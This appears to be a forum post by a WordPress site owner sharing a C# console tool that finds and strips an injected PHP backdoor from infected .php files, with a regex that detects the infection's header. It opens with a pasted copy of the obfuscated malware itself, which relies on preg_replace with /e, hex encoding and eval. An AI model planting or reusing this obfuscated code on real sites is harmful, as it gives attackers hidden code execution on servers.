preg_replace("%x2f%50%x2e%52%x29%57%x7fmji%x5c%x7878621<%x5cx5c%x7825:osvufs:~928>>%x5c%x780gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x782323ldfidk!~!<**qp%x5c%x7825!7;utpI#7>%x5c%x782f7rfs%x5c7fw6*CW&)7gj6<.[A%x5c%6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujoc%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x7{jt)!gj!<*2bd%x5c%x7825-#1GO%f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x%x7860hA%x5c%x7827pd%x5c%x7%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fep7860hA%x5c%x7827pd%x5c%x78256u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%xx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825npd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%sv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787f825w6Z6<.4%x5c%x7860hA%x5c%x7827c%x7825-#jt0}Z;0]=]0#)2!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x7825Z<^2%x5c%x785c2%x7825j=6[%x5c%x7825ww2!>#p#%x525>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x78)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x^-%x5c%x7825hOh%x5c%%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6<%860{6:!}7;!}6;##}C;!>>!x5c%x7822)!gj}1~!<2p%25r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o%x5c%x7825)!gj!<2,*j%7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbM5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x77;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%55Ld]55#*<%x5c%x7825bG7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>:+946:ce44#)zbssb!>!ssbnpex7825tww**WYsboepn)%x5c)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;my%x5c%x7825,3,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%xx782400~:q%x5c%x78256<%x5c%x787fwfs%x5c%x78256<*17-SFEBFI,878{**#k#)tutjyf%x5c%x7860%x7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)CW&)7gj6<*doj%x5c%x785%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y35c%x7822!ftmbg)!gj<*#x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x73of>2bd%x5c%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%4-%x5c%x7824!>!fyqmpef)#%x5c%x7824*!#]y3d]51]5b:>1%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)mx7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x782273]y76]258]y6g]273]y7666~67<&w6<*&7-#o]s]o]s]825s:%x5c%x785c%x5c%x7825j:.2^,%x5c%x7825b:%x5c%x7825s:57%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x782322]3]364]6]283]427]36]373P6]36]73]83]238po#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)y83]256]y81]265]y72]254]y76]61]y33]68]y[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c27827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7885cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x782%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6!%x5c65]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]275c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5cx5c%x782fh%x5c%x7825)GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS[")7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827t4)#P#-#Q#-#B#-#T#-#E#-#G2)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824!%x5c%x.;%x5c%x7860UQPMSVD!-id%x5c%msv%x5c%x7825)}k~~~!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%5<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48yc%x7825z>>2*!%x5c%x7825z>32#]y74]273]y76]252]y85]256]y6g]257]f]63]y3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)6<*QDU%x5c%x7860MPT7-NBFSUT%x525)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x782/(.*)/epreg_replacedjblbnsdwy'; $qzzwqleqqo = explode(chr((273-229)),'1058,68,9328,48,501,33,832,29,5353,65,4624,40,4856,50,40,50,9096,57,9002,48,9888,55,3941,41,5932,39,6204,32,4587,37,5848,27,883,39,1361,52,8401,23,6670,42,9050,46,7695,55,5418,61,1654,21,5613,27,3108,30,6150,54,4794,62,10009,30,5727,58,3490,42,5003,56,386,21,10039,67,8494,65,230,42,7901,69,8918,41,7600,42,942,57,7750,21,3812,21,1474,52,1037,21,2244,55,9376,58,7642,25,5662,65,3237,35,561,53,5640,22,4041,44,6712,23,3982,59,3295,58,9561,28,2064,62,8757,54,4379,52,1888,41,9589,32,999,38,6484,43,6441,43,1588,21,4136,60,6800,21,1752,61,4196,26,7436,51,6821,36,1721,31,1994,70,4085,51,2638,70,6099,51,6735,21,8040,35,6390,20,3532,48,5785,29,9943,66,7970,70,5149,58,5875,57,2126,67,9458,42,3685,31,7232,36,5814,34,2299,38,1675,25,4526,61,5059,25,5207,58,7124,26,2447,38,181,49,2708,64,674,39,8600,50,4222,38,5585,28,272,44,3427,63,4431,39,7390,46,8959,43,6982,69,5507,31,3781,31,4311,68,2548,42,6034,65,6527,61,7880,21,7268,63,3580,50,3272,23,5971,63,9264,43,8221,40,6916,66,7667,28,1609,45,1184,65,4260,51,6236,23,534,27,7547,53,7173,59,4664,35,4906,61,4750,44,9216,48,9829,59,4699,51,7487,60,316,70,1813,20,9307,21,922,20,8261,65,6608,62,2590,48,9719,57,2215,29,9500,61,861,22,3392,35,8378,23,2794,59,1833,55,3915,26,4470,56,7771,61,7073,51,6259,38,2772,22,8326,52,1929,65,3833,25,614,60,1700,21,137,44,5538,47,8075,62,2853,70,407,43,9153,63,450,51,90,47,7331,59,8873,45,6297,35,8689,68,6588,20,3138,62,7150,23,7832,48,3010,60,3630,55,3070,38,8811,62,9661,58,2485,63,1315,46,6857,59,7051,22,1413,61,9621,40,2404,43,1526,62,8559,41,2337,67,810,22,2982,28,6332,58,4967,36,6756,44,1249,66,5084,65,8137,32,8424,70,2193,22,2924,58,5479,28,6410,31,3353,39,9776,53,5265,45,713,28,3858,57,9434,24,5310,43,3716,65,3200,37,1126,58,8169,52,8650,39,741,69,0,40,2923,1'); $ifjhyarlhw=substr($ghkpbkldao,(36181-26075),(32-25)); if (!function_exists('wpatekrfkn')) { function wpatekrfkn($lvejcmnday, $tqebttflow) { $wzjddmebme = NULL; for($bkbmnonwwh=0;$bkbmnonwwh<(sizeof($lvejcmnday)/2);$bkbmnonwwh++) { $wzjddmebme .= substr($tqebttflow, $lvejcmnday[($bkbmnonwwh*2)],$lvejcmnday[($bkbmnonwwh*2)+1]); } return $wzjddmebme; };} $szerhjoqyk="\x20\57\x2a\40\x64\143\x63\141\x70\161\x7a\146\x6c\165\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\64\x30\55\x32\60\x33\51\x29\54\x20\143\x68\162\x28\50\x36\64\x32\55\x35\65\x30\51\x29\54\x20\167\x70\141\x74\145\x6b\162\x66\153\x6e\50\x24\161\x7a\172\x77\161\x6c\145\x71\161\x6f\54\x24\147\x68\153\x70\142\x6b\154\x64\141\x6f\51\x29\51\x3b\40\x2f\52\x20\150\x78\153\x69\142\x74\156\x74\164\x64\40\x2a\57\x20"; $eehkaejhtl=substr($ghkpbkldao,(31400-21287),(65-53)); $eehkaejhtl($ifjhyarlhw, $szerhjoqyk, NULL); $eehkaejhtl=$szerhjoqyk; $eehkaejhtl=(651-530); $ghkpbkldao=$eehkaejhtl-1; ?>

Tired of this haks I wrote a small .cs colsole for cleaning this files.
Other websites suggest a .sh script but I’m a Windows user and I’d use its tools.

Feel free to use/edit/whatever this code:


using System;
using System.Text;
using System.IO;
using System.Text.RegularExpressions;

namespace ConsoleApplicationCleanWordpress
{
    class Program
    {

        static Regex re = new Regex(@"^<\?php\sif\(\!isset\(\$GLOBALS\[" + "\"" + @"\\x61\\156\\x75\\156\\x61" + "\"" + @"\]\)\)\s.*\s\?>");

        //static Regex re = new Regex(@"^<\?php.*(\#\-\!OVMM\*\<%x22%51%x29%51%x29%73"", NULL\);).*\s\?>");

        static int count = 0;

        static void Main(string[] args)
        {
            cleanFolder(@"C:\Users\max\Desktop\public_html");

            Console.WriteLine(count + " infecetd files.");
            Console.WriteLine("THE END!");
            Console.ReadLine();

        }

        private static void cleanFolder(string folder)
        {
            var di = new DirectoryInfo(folder);

            foreach (var subfolder in di.GetDirectories())
                cleanFolder(subfolder.FullName);

            /*
            foreach (var file in di.GetFiles())
            {
                if (file.FullName.ToLower().EndsWith(".php"))
                    cleanFile(file);
                else
                    file.Delete(); // don't need to upload it anymore (css, js, big files, etc)
            }
            */

            foreach (var file in di.GetFiles("*.php"))
                cleanFile(file);

        }

        private static void cleanFile(FileInfo file)
        {
            var content = File.ReadAllText(file.FullName);
            if (re.IsMatch(content))
            {
                var orig = file.FullName;
                Console.WriteLine(++count + " Infected: " + orig);
                file.MoveTo(orig + ".bk");
                File.WriteAllText(orig, re.Replace(content, ""));
            }
        }
    }
}


Other resources: